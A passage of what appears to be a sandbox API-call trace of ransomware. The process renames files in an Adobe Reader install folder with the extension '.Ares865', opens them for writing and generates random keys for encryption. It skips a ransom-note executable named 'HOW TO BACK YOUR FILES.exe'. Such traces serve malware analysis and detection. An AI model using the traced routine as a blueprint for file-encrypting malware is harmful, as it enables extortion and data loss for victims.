[0168.776] lstrlenW (lpString="Onix32.dll") returned 10 [0168.776] lstrlenW (lpString="Ares865") returned 7 [0168.776] lstrcmpiW (lpString1="x32.dll", lpString2="Ares865") returned 1 [0168.777] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Onix32.dll.Ares865") returned 66 [0168.777] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Onix32.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\onix32.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Onix32.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\onix32.dll.ares865"), dwFlags=0x1) returned 1 [0168.780] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Onix32.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\onix32.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0168.780] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=759816) returned 1 [0168.781] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0168.781] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0168.781] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.824] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0168.825] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0168.825] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.835] lstrcpyW (in: lpString1=0x2cce460, lpString2="PDFPrevHndlr.dll" | out: lpString1="PDFPrevHndlr.dll") returned="PDFPrevHndlr.dll" [0168.835] lstrlenW (lpString="PDFPrevHndlr.dll") returned 16 [0168.835] lstrlenW (lpString="Ares865") returned 7 [0168.835] lstrcmpiW (lpString1="dlr.dll", lpString2="Ares865") returned 1 [0168.836] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\PDFPrevHndlr.dll.Ares865") returned 72 [0168.836] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\PDFPrevHndlr.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\pdfprevhndlr.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\PDFPrevHndlr.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\pdfprevhndlr.dll.ares865"), dwFlags=0x1) returned 1 [0168.839] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\PDFPrevHndlr.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\pdfprevhndlr.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0168.839] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=84896) returned 1 [0168.839] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0168.840] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0168.840] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.848] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0168.849] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0168.849] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.851] lstrcpyW (in: lpString1=0x2cce460, lpString2="PDFSigQFormalRep.pdf" | out: lpString1="PDFSigQFormalRep.pdf") returned="PDFSigQFormalRep.pdf" [0168.851] lstrlenW (lpString="PDFSigQFormalRep.pdf") returned 20 [0168.851] lstrlenW (lpString="Ares865") returned 7 [0168.851] lstrcmpiW (lpString1="Rep.pdf", lpString2="Ares865") returned 1 [0168.851] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\PDFSigQFormalRep.pdf.Ares865") returned 76 [0168.851] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\PDFSigQFormalRep.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\pdfsigqformalrep.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\PDFSigQFormalRep.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\pdfsigqformalrep.pdf.ares865"), dwFlags=0x1) returned 1 [0168.854] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\PDFSigQFormalRep.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\pdfsigqformalrep.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0168.854] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=468206) returned 1 [0168.854] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0168.855] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0168.855] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.877] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0168.878] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0168.878] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.885] lstrcpyW (in: lpString1=0x2cce460, lpString2="pe.dll" | out: lpString1="pe.dll") returned="pe.dll" [0168.885] lstrlenW (lpString="pe.dll") returned 6 [0168.885] lstrlenW (lpString="Ares865") returned 7 [0168.885] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\pe.dll.Ares865") returned 62 [0168.885] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\pe.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\pe.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\pe.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\pe.dll.ares865"), dwFlags=0x1) returned 1 [0168.887] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\pe.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\pe.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0168.887] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1629576) returned 1 [0168.887] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0168.888] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0168.888] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.994] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0168.995] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0168.995] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.016] lstrcpyW (in: lpString1=0x2cce460, lpString2="piaglbreakfinder.dll" | out: lpString1="piaglbreakfinder.dll") returned="piaglbreakfinder.dll" [0169.016] lstrlenW (lpString="piaglbreakfinder.dll") returned 20 [0169.016] lstrlenW (lpString="Ares865") returned 7 [0169.016] lstrcmpiW (lpString1="der.dll", lpString2="Ares865") returned 1 [0169.016] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\piaglbreakfinder.dll.Ares865") returned 76 [0169.016] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\piaglbreakfinder.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\piaglbreakfinder.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\piaglbreakfinder.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\piaglbreakfinder.dll.ares865"), dwFlags=0x1) returned 1 [0169.019] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\piaglbreakfinder.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\piaglbreakfinder.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.020] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16808) returned 1 [0169.020] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.021] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.021] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.031] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.032] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.032] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.033] lstrcpyW (in: lpString1=0x2cce460, lpString2="plug_ins" | out: lpString1="plug_ins") returned="plug_ins" [0169.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0169.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1808 [0169.033] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0169.033] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dbbfec0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54862d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54862d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="plug_ins3d", cAlternateFileName="PLUG_I~1")) returned 1 [0169.033] lstrcmpiW (lpString1="plug_ins3d", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0169.033] lstrcmpiW (lpString1="plug_ins3d", lpString2="aoldtz.exe") returned 1 [0169.033] lstrcpyW (in: lpString1=0x2cce460, lpString2="plug_ins3d" | out: lpString1="plug_ins3d") returned="plug_ins3d" [0169.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0169.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1688 [0169.033] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0169.033] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80378de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pmd.cer", cAlternateFileName="")) returned 1 [0169.033] lstrcmpiW (lpString1="pmd.cer", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0169.033] lstrcmpiW (lpString1="pmd.cer", lpString2="aoldtz.exe") returned 1 [0169.034] lstrcpyW (in: lpString1=0x2cce460, lpString2="pmd.cer" | out: lpString1="pmd.cer") returned="pmd.cer" [0169.034] lstrlenW (lpString="pmd.cer") returned 7 [0169.034] lstrlenW (lpString="Ares865") returned 7 [0169.034] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\pmd.cer.Ares865") returned 63 [0169.034] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\pmd.cer" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\pmd.cer"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\pmd.cer.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\pmd.cer.ares865"), dwFlags=0x1) returned 1 [0169.037] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\pmd.cer.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\pmd.cer.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.037] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=420) returned 1 [0169.038] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.038] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.038] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.042] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.042] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.042] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.043] lstrcpyW (in: lpString1=0x2cce460, lpString2="reader_sl.exe" | out: lpString1="reader_sl.exe") returned="reader_sl.exe" [0169.043] lstrlenW (lpString="reader_sl.exe") returned 13 [0169.043] lstrlenW (lpString="Ares865") returned 7 [0169.043] lstrcmpiW (lpString1="_sl.exe", lpString2="Ares865") returned -1 [0169.043] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\reader_sl.exe.Ares865") returned 69 [0169.043] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\reader_sl.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\reader_sl.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\reader_sl.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\reader_sl.exe.ares865"), dwFlags=0x1) returned 1 [0169.045] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\reader_sl.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\reader_sl.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.045] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=35736) returned 1 [0169.046] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.046] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.046] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.051] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.051] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.051] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.052] lstrcpyW (in: lpString1=0x2cce460, lpString2="rt3d.dll" | out: lpString1="rt3d.dll") returned="rt3d.dll" [0169.052] lstrlenW (lpString="rt3d.dll") returned 8 [0169.052] lstrlenW (lpString="Ares865") returned 7 [0169.052] lstrcmpiW (lpString1="t3d.dll", lpString2="Ares865") returned 1 [0169.053] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\rt3d.dll.Ares865") returned 64 [0169.053] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\rt3d.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\rt3d.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\rt3d.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\rt3d.dll.ares865"), dwFlags=0x1) returned 1 [0169.055] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\rt3d.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\rt3d.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.055] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2207632) returned 1 [0169.055] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.056] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.056] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.209] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.209] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.209] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.219] lstrcpyW (in: lpString1=0x2cce460, lpString2="RTC.der" | out: lpString1="RTC.der") returned="RTC.der" [0169.219] lstrlenW (lpString="RTC.der") returned 7 [0169.219] lstrlenW (lpString="Ares865") returned 7 [0169.220] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RTC.der.Ares865") returned 63 [0169.220] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RTC.der" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\rtc.der"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RTC.der.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\rtc.der.ares865"), dwFlags=0x1) returned 1 [0169.223] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RTC.der.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\rtc.der.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.223] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1098) returned 1 [0169.223] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.224] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.224] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.226] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.227] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.227] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.227] lstrcpyW (in: lpString1=0x2cce460, lpString2="ScCore.dll" | out: lpString1="ScCore.dll") returned="ScCore.dll" [0169.228] lstrlenW (lpString="ScCore.dll") returned 10 [0169.228] lstrlenW (lpString="Ares865") returned 7 [0169.228] lstrcmpiW (lpString1="ore.dll", lpString2="Ares865") returned 1 [0169.228] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ScCore.dll.Ares865") returned 66 [0169.228] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ScCore.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\sccore.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ScCore.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\sccore.dll.ares865"), dwFlags=0x1) returned 1 [0169.230] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ScCore.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\sccore.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.230] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=589712) returned 1 [0169.230] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.231] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.231] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.257] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.258] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.258] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.266] lstrcpyW (in: lpString1=0x2cce460, lpString2="Services" | out: lpString1="Services") returned="Services" [0169.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0169.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1888 [0169.266] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0169.266] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffc0b80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5483cc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5483cc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SPPlugins", cAlternateFileName="SPPLUG~1")) returned 1 [0169.266] lstrcmpiW (lpString1="SPPlugins", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0169.266] lstrcmpiW (lpString1="SPPlugins", lpString2="aoldtz.exe") returned 1 [0169.266] lstrcpyW (in: lpString1=0x2cce460, lpString2="SPPlugins" | out: lpString1="SPPlugins") returned="SPPlugins" [0169.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0169.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1908 [0169.266] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0169.266] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d81e80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3cd90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sqlite.dll", cAlternateFileName="")) returned 1 [0169.267] lstrcmpiW (lpString1="sqlite.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0169.267] lstrcmpiW (lpString1="sqlite.dll", lpString2="aoldtz.exe") returned 1 [0169.267] lstrcpyW (in: lpString1=0x2cce460, lpString2="sqlite.dll" | out: lpString1="sqlite.dll") returned="sqlite.dll" [0169.267] lstrlenW (lpString="sqlite.dll") returned 10 [0169.267] lstrlenW (lpString="Ares865") returned 7 [0169.267] lstrcmpiW (lpString1="ite.dll", lpString2="Ares865") returned 1 [0169.267] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 